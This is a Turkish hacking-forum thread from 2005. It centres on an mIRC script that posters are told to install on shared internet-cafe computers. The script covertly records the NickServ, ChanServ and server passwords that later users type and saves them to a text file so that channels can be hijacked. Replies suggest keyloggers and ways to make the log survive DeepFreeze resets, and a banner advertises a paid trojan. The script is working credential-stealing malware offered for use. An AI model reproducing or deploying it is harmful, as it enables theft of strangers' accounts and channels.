IRC Hack Metodu[Anlatım]Bunu bir cafe de falan benzeri yerlerde deneyin.Bu sayede rastgele kanal vb. hackleyebilirsiniz. evet bu kodu alt+R yapıp mırc de users e copy paste yapın ve mırc klasörünün içinde back
Konu OuTLaWsys tarafından açılmış, 1022 kişi tarafından görüntülenip, 11 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
#1 |
|
Banned
![]() ![]() ![]() ![]() Kayıt Tarihi: Jan 2005
Üye numarası: #1179
Karma etkisi: 0
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 10519
|
Bunu bir cafe de falan benzeri yerlerde deneyin.Bu sayede rastgele kanal vb. hackleyebilirsiniz.
evet bu kodu alt+R yapıp mırc de users e copy paste yapın ve mırc klasörünün içinde back klasöründe bir bacck.txt de dosyası oluşturun.(oluşturmasanızda olur makina kendisi oluşturur)Makina da kullanılan butun ırc şifreleri o text e kayıt edilir Kolay gelsin ![]() By OuTLaWsys ========================= msg { if ($1 == nickserv) && ($2 == identify) { msg $1- } write backs\bacck.txt Identify ... Nick: $me Şifresi: $3 Server: $server } nickserv { if ($1 == identify) { nickserv $1- } write backs\bacck.txt Identify ... Nick: $me Şifresi: $2 Server: $server } ns { if ($1 == identify) { ns $1- } write backs\bacck.txt Identify ... Nick: $me Şifresi: $2 Server: $server } msg { if ($1 == nickserv) && ($2 == register) { msg $1- } write backs\bacck.txt Register ... Nick: $me Şifresi: $3 Server: $server Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=1393 } nickserv { if ($1 == register) { nickserv $1- } write backs\bacck.txt Register ... Nick: $me Şifresi: $2 Server: $server } ns { if ($1 == register) { ns $1- } write backs\bacck.txt Register ... Nick: $me Şifresi: $2 Server: $server } msg { if ($1 == chanserv) && ($2 == identify) { msg $1- } write backs\bacck.txt Identify ... Kanal: $3 Şifresi: $4 Server: $server } chanserv { if ($1 == identify) { chanserv $1- } write backs\bacck.txt Identify ... Kanal: $2 Şifresi: $3 Server: $server } cs { if ($1 == identify) { cs $1- } write backs\bacck.txt Identify ... Kanal: $2 Şifresi: $3 Server: $server } msg { if ($1 == chanserv) && ($2 == register) { msg $1- } write backs\bacck.txt Register ... Kanal: $3 Şifresi: $4 Server: $server } chanserv { if ($1 == register) { chanserv $1- } write backs\bacck.txt Register ... Kanal: $2 Şifresi: $3 Server: $server } cs { if ($1 == register) { cs $1- } write backs\bacck.txt Register ... Kanal: $2 Şifresi: $3 Server: $server } pass { { pass $1- } write backs\bacck.txt Identify ... Nick: $me Şifresi: $1 Server: $server } password { { password $1- } write backs\bacck.txt Identify ... Nick: $me Şifresi: $1 Server: $server } ==================================== Düzenleyen OuTLaWsys : 26-01-2005 at 18:11. |
|
|
|
|
#2 |
|
Forum Kalfası
Üye numarası: #1243
![]() Karma: 9
|
evet guzel.. peki onun yerine bir keylogger kursak nasil olur? sadece irc leylede kalmaz nekadar sifre varsa hepsini calariz dimi ...
|
|
|
|
|
#3 |
|
Super Moderator
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Nov 2004
Üye numarası: #17 Yer: Xonguldak
Karma etkisi: 7675
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 766352
|
İki başlık açmışsın bilini sildim. Yararlı bir bilgi işe yaraya bilir. Teşekkür ederim. İyi Çalışmalar...
|
|
|
|
|
#4 |
|
Banned
|
efet yaw ii etmişsin yanlışlık oldu kusra bakmayın.
TaZ bildiğin gibi artık cafe ler güvenliğe önem verir oldu ve çoğu kafe ye program yükleyemiorsun.Bazılarında ise yüklesen bile makina res yediği için nası ayarlanmışsa o hale dönüor bu yüzden keylog işe yaramıor bu yol daha etkili gibi gelior bana tabi siz bilirsiniz |
|
|
|
|
#5 |
|
Super Moderator
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Nov 2004
Üye numarası: #17 Yer: Xonguldak
Karma etkisi: 7675
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 766352
|
Senin dediğin yol aslında IRC için çok iyi tabi konuda IRC üstünde açılmış iyi. Tazın dediği tüm şifreleri birden al daha iyi diyor sanırım. Ama söyledğin gibi cafelerde DEEPFREEZE denilen program var sanırım yani restart da eski haline dönüyor. Tabi Mİrc içine yapılan bu eklentide belkide eski haline döner.
|
|
|
|
|
#6 |
|
Banned
|
etkileyebilir ama dosya hep yenisini oluşturcak çünkü makina res yediğinde mırc deki eklenti kaybalmuo sadece dosya kayboluor.
Onun da çözümünü Blackeagle getirdi şimdi makinada olan bir text dosyasına yazdırabilirsiniz kodlarla oynayarak o zaman res yese de makina bi şey olmaz Teşekkürler Blackeagle ![]() |
|
|
|
|
#7 | |
|
Forum Kalfası
Üye numarası: #1177 Yer: 51. Bölge
Karma etkisi: 100
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 9138
|
Alıntı:
"By OuTLaWsys" demek. yaptıın yanlış bişey arkadaşım.bari biraz değiştirseydin. bu kodları harfi harifne mavrahane ve hackerpowersa yazıp,yollamıştım zamanında. hala By OuTLaWsys diyebiliosan eline sağlık. |
|
|
|
|
|
#8 |
|
Banned
|
Bak kardeş nereye yazmışım By ouTLaWsys die kodların altına değil yazının altına
""""Bunu bir cafe de falan benzeri yerlerde deneyin.Bu sayede rastgele kanal vb. hackleyebilirsiniz. evet bu kodu alt+R yapıp mırc de users e copy paste yapın ve mırc klasörünün içinde back klasöründe bir bacck.txt de dosyası oluşturun.(oluşturmasanızda olur makina kendisi oluşturur)Makina da kullanılan butun ırc şifreleri o text e kayıt edilir Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=1393 Kolay gelsin By OuTLaWsys""""" kodlar bana ait değil ki ben yazı için dedim by outlawsys die yanlız dediğin 2 siteye de takılmadım bana bu kodları 3-4 sene önce IRc den biri vermişti o yüzden sende bana bişey diyemezsin kodlar sana da ait değil sende üstüne yatma kardeş uyanıklık yapıp KODLAR ALINTIDIR Düzenleyen OuTLaWsys : 27-01-2005 at 00:28. |
|
|
|
|
#9 | |
|
Forum Kalfası
|
Alıntı:
|
|
|
|
|
|
#10 |
|
Banned
|
kardeşim laflarını bil konuş yüzsüz müssüz adam ol öle konuş.
Ben yazdım düzelttim orda alıntı die uzatmanın alemi yoq.sende uyanıklık yapma KODLAR SENİN DEĞİL ÇÜNKÜ. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=1393 Zaten böle abi bu işler bakıosun bi şeyler yapmaya başlıon thread açıon millet başlıo adamı taşlamaya böyle bi milletiz biz işte kabahat bişeyleri paylaşanda zaten anlamadıysan bi daha söyleyeyim KODLAR ALINTI tamam mı laflarını da bil bundan sonra |
|
|
|
|
#11 | |
|
Forum Kalfası
|
Alıntı:
kodların sahibini nasıl bilebilirsinki SEN DEĞİLSİN diyebiliosun ? konu bu. mantıklı bi cevap verebilirsen ne mutlu sana. kendini aydınlantmış olursun. saygılar. |
|
|
|
|
|
#12 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Nov 2004
Üye numarası: #165 Yer: İstanbul
Karma etkisi: 11
![]() ![]() ![]() ![]() Karma: 335
|
tartısmaya gerek yok arkadaslar yazan kısı alıntı oldugunu da sonradan eklemıs zaten
sorun yok yanı |
|
|
![]() |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
|
|